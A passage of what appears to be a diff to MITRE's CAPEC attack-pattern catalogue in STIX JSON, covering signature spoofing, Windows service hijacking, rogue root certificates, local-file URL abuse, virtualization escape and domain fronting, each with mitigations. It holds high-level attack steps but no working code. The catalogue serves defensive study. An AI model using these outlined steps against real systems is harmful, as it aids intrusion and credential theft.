"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--3605759e-9ca2-443d-901d-741c0c2033c6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--500e5e72-3b87-4258-b3e5-53fce6b4b801", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.", + "external_references": [ + { + "external_id": "CAPEC-475", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/475.html" + }, + { + "external_id": "CWE-347", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/347.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-295", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/295.html" + }, + { + "description": "Kenn White, Microsoft's Chain of Fools, 2020--01---15, First Principles", + "external_id": "REF-562", + "source_name": "reference_from_CAPEC", + "url": "https://blog.lessonslearned.org/chain-of-fools/" + }, + { + "description": "Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers, 2020--01---14, National Security Agency (NSA)", + "external_id": "REF-563", + "source_name": "reference_from_CAPEC", + "url": "https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF" + }, + { + "description": "Thomas Ptacek, Thomas Pornin, Analysis of REF-563, Hacker News", + "external_id": "REF-564", + "source_name": "reference_from_CAPEC", + "url": 
"https://news.ycombinator.com/item?id=22048619" + } + ], + "id": "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Signature Spoofing by Improper Validation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The Windows CryptoAPI (Crypt32.dll) was shown to be vulnerable to signature spoofing by failing to properly validate Elliptic Curve Cryptography (ECC) certificates. If the CryptoAPI's signature validator allows the specification of a nonstandard base point (G): \"An adversary can create a custom ECDSA certificate with an elliptic curve (ECC) signature that appears to match a known standard curve, like P-256 that includes a public key for an existing known trusted certificate authority, but which was in fact not signed by that certificate authority. Windows checks the public key and other curve parameters, but not the (bespoke adversary-supplied) base point generator (G) parameter constant which actually generated the curve\" [REF-562]. Exploiting this vulnerability allows the adversary to leverage a spoofed certificate to dupe trusted network connections and deliver/execute malicious code, while appearing as legitimately trusted entity [REF-563]. This ultimately tricks the victim into believing the malicious website or executable is legitimate and originates from a properly verified source. See also: CVE-2020-0601" + ], + "x_capec_extended_description": "\n Signature verification algorithms are generally used to determine whether a certificate or piece of code (e.g. executable, binary, etc.) 
possesses a valid signature and can be trusted.\n If the leveraged algorithm confirms that a valid signature exists, it establishes a foundation of trust that is further conveyed to the end-user when interacting with a website or application. However, if the signature verification algorithm improperly validates the signature, either by not validating the signature at all or by failing to fully validate the signature, it could result in an adversary generating a spoofed signature and being classified as a legitimate entity. Successfully exploiting such a weakness could further allow the adversary to reroute users to malicious sites, steals files, activates microphones, records keystrokes and passwords, wipes disks, installs malware, and more.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Recipient is using a weak cryptographic signature verification algorithm or a weak implementation of a cryptographic signature verification algorithm, or the configuration of the recipient's application accepts the use of keys generated using cryptographically weak signature verification algorithms." 
+ ], + "x_capec_skills_required": { + "High": "Reverse engineering and cryptanalysis of signature verification algorithm implementation" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use programs and products that contain cryptographic elements that have been thoroughly tested for flaws in the signature verification routines.", + "id": "course-of-action--c68612c7-a3bf-4a0e-8416-0cc58982766d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-475-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca2272d5-9269-4fa1-9964-f2d6d45c271c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c68612c7-a3bf-4a0e-8416-0cc58982766d", + "target_ref": "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer's identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.", + "external_references": [ + { + "external_id": "CAPEC-476", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/476.html" + }, + { + "external_id": 
"CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Eric Johanson, The state of homograph attacks, 2005--02---11, http://www.shmoo.com/idn/homograph.txt", + "external_id": "REF-414", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Signature Spoofing by Misrepresentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Recipient is using signature verification software that does not clearly indicate potential homographs in the signer identity.Recipient is using signature verification software that contains a parsing vulnerability, or allows control characters in the signer identity field, such that a signature is mistakenly displayed as valid and from a known or authoritative signer." + ], + "x_capec_skills_required": { + "High": "Attacker may be required to create malformed data blobs and know how to insert them in a location that the recipient will visit." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the application is using parsing and data display techniques that will accurately display control characters, international symbols and markings, and ultimately recognize potential homograph attacks.", + "id": "course-of-action--694ab70c-12fd-45fd-8fa9-0806c5da0396", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-476-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--82379432-2b82-4aca-a835-238f54a057ef", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--694ab70c-12fd-45fd-8fa9-0806c5da0396", + "target_ref": "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data.", + "external_references": [ + { + "external_id": "CAPEC-477", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/477.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + 
{ + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + } + ], + "id": "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Signature Spoofing by Mixing Signed and Unsigned Content", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Signer and recipient are using complex data storage structures that allow for a mix between signed and unsigned data", + "Recipient is using signature verification software that does not maintain separation between signed and unsigned data once the signature has been verified." + ], + "x_capec_skills_required": { + "High": "Attacker must be able to create malformed data blobs and know how to insert them in a location that the recipient will visit." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the application is fully patched and does not allow the processing of unsigned data as if it is signed data.", + "id": "course-of-action--f9df8e0c-94b6-4847-ad19-ece4cc20afe0", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-477-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6679a0b9-deee-47e3-81d3-9d55d39d9207", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f9df8e0c-94b6-4847-ad19-ece4cc20afe0", + "target_ref": "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. 
The goal of this attack is to execute a malicious binary in place of an existing service.", + "external_references": [ + { + "external_id": "CAPEC-478", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/478.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Hijack Execution Flow:Service Registry Permissions Weakness", + "external_id": "T1574.011", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/011" + }, + { + "description": "Create or Modify System Process:Windows Service", + "external_id": "T1543.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543/003" + } + ], + "id": "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Modification of Windows Service Configuration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands (By altering specific configuration settings for the service, the adversary could run arbitrary code to be executed.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target system: The adversary must first determine the system they wish to modify the registry of. This needs to be a windows machine as this attack only works on the windows registry.

Experiment

  1. Gain access to the system: The adversary needs to gain access to the system in some way so that they can modify the windows registry.

  2. Techniques
    Gain physical access to a system either through shoulder surfing a password or accessing a system that is left unlocked.
    Gain remote access to a system through a variety of means.

Exploit

  1. Modify windows registry: The adversary will modify the windows registry by changing the configuration settings for a service. Specifically, the adversary will change the path settings to define a path to a malicious binary to be executed.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the capability to write to the Windows Registry on the targeted system." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Usable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.", + "id": "course-of-action--25c25dbf-033d-40de-8314-255ce51d1e3d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-478-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--defdb513-7363-40a3-a5c5-41ca51464c89", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--25c25dbf-033d-40de-8314-255ce51d1e3d", + "target_ref": "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-26T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authorization and installs a new root certificate on a compromised system. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. 
When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.", + "external_references": [ + { + "external_id": "CAPEC-479", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/479.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Subvert Trust Controls:Install Root Certificate", + "external_id": "T1553.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/004" + } + ], + "id": "attack-pattern--a35eb10e-1168-4c77-8f46-87fa6ee40ef7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Malicious Root Certificate", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the ability to create a new root certificate." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack relies on client side code to access local files and resources instead of URLs. 
When the client browser is expecting a URL string, but instead receives a request for a local file, that execution is likely to occur in the browser process space with the browser's authority to local files. The attacker can send the results of this request to the local files out to a site that they control. This attack may be used to steal sensitive authentication data (either local or remote), or to gain system profile information to launch further attacks.", + "external_references": [ + { + "external_id": "CAPEC-48", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/48.html" + }, + { + "external_id": "CWE-241", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/241.html" + }, + { + "external_id": "CWE-706", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Core Concepts: Attack Patterns", + "external_id": "REF-416", + "source_name": "reference_from_CAPEC", + "url": "https://websec.io/2012/11/26/Core-Concepts-Attack-Patterns.html" + } + ], + "id": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Passing Local Filenames to Functions That Expect a URL", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n J2EE applications frequently use .properties files to store configuration information including JDBC connections, LDAP connection strings, 
proxy information, system passwords and other system metadata that is valuable to attackers looking to probe the system or bypass policy enforcement points. When these files are stored in publicly accessible directories and are allowed to be read by the public user, then an attacker can list the directory identify a .properties file and simply load its contents in the browser listing its contents. A standard Hibernate properties file contains\n hibernate.connection.driver_class = org.postgresql.Driverhibernate.connection.url = jdbc:postgresql://localhost/mydatabasehibernate.connection.username = usernamehibernate.connection.password = passwordhibernate.c3p0.min_size=5hibernate.c3p0.max_size=20\n Even if the attacker cannot write this file, there is plenty of information to leverage to gain further access.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify web application URL inputs: Review application inputs to find those that are designed to be URLs.

  2. Techniques
    Manually navigate web site pages to identify URLs.
    Use automated tools to identify URLs.

Experiment

  1. Identify URL inputs allowing local access.: Execute test local commands via each URL input to determine which are successful.

  2. Techniques
    Manually execute a local command (such as 'pwd') via the URL inputs.
    Using an automated tool, test each URL input for weakness.

Exploit

  1. Execute malicious commands: Using the identified URL inputs that allow local command execution, execute malicious commands.

  2. Techniques
    Execute local commands via the URL input.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The victim's software must not differentiate between the location and type of reference passed the client software, e.g. browser" + ], + "x_capec_skills_required": { + "Medium": "Attacker identifies known local files to exploit" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e108a43f-d09d-41e1-8c5d-d88b4e285dc8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure all configuration files and resource are either removed or protected when promoting code into production.", + "id": "course-of-action--536001f7-8712-4a06-82c7-2a5e7008aa72", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-48-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a9b80a78-9847-4310-b5a4-59689e59d949", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--536001f7-8712-4a06-82c7-2a5e7008aa72", + "target_ref": 
"attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--840a14c4-8158-43a5-9dbf-7913a86a244f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cf36118d-637c-4216-a672-9f18e372b78c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f3cc7fae-f66b-4499-8930-bca7d098c80c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2e8384c4-b7dc-49d2-990a-83e058990579", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "target_ref": "attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gains access to an application, service, or device with the privileges of an authorized or privileged user by escaping the confines of a virtualized environment. The adversary is then able to access resources or execute unauthorized code within the host environment, generally with the privileges of the user running the virtualized process. Successfully executing an attack of this type is often the first step in executing more complex attacks.", + "external_references": [ + { + "external_id": "CAPEC-480", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/480.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Escape to Host", + "external_id": "T1611", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1611" + } + ], + "id": "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Escaping Virtualization", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute 
Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The adversary probes the target application, service, or device to find a possible weakness that would allow escaping the virtualized environment.

  2. Techniques
    Probing applications, services, or devices for virtualization weaknesses.

Experiment

  1. Verify the exploitable security weaknesses: Using the found weakness, the adversary attempts to escape the virtualized environment.

  2. Techniques
    Using an application weakness to escape a virtualized environment

Exploit

  1. Execute more complex attacks: Once outside of the virtualized environment, the adversary attempts to perform other more complex attacks such as accessing system resources or executing unauthorized code within the host environment.

  2. Techniques
    Executing complex attacks when given higher permissions by escaping a virtualized environment
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure virtualization software is current and up-to-date.", + "id": "course-of-action--f7d97bf5-f247-488c-9be8-811a887b8cfd", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-480-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c2cbe557-9342-4193-a6f9-e79a120bbc41", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7d97bf5-f247-488c-9be8-811a887b8cfd", + "target_ref": "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Abide by the least privilege principle to avoid assigning users more privileges than necessary.", + "id": "course-of-action--bf819a99-45a3-4059-8c63-366a7fb34b88", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-480-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2bfc97de-cce3-45f4-b6d9-b32d60e99c84", + "modified": 
"2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf819a99-45a3-4059-8c63-366a7fb34b88", + "target_ref": "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries can provide contradictory destinations when sending messages. Traffic is routed in networks using the domain names in various headers available at different levels of the OSI model. In a Content Delivery Network (CDN) multiple domains might be available, and if there are contradictory domain names provided it is possible to route traffic to an inappropriate destination. The technique, called Domain Fronting, involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. 
An alternative technique, called Domainless Fronting, is similar, but the SNI field is left blank.", + "external_references": [ + { + "external_id": "CAPEC-481", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/481.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Proxy:Domain Fronting", + "external_id": "T1090.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1090/004" + } + ], + "id": "attack-pattern--4733a63a-db36-49fa-8eba-3d5eddfe7f87", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Contradictory Destinations in Traffic Routing Schemes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary must be aware that their message will be 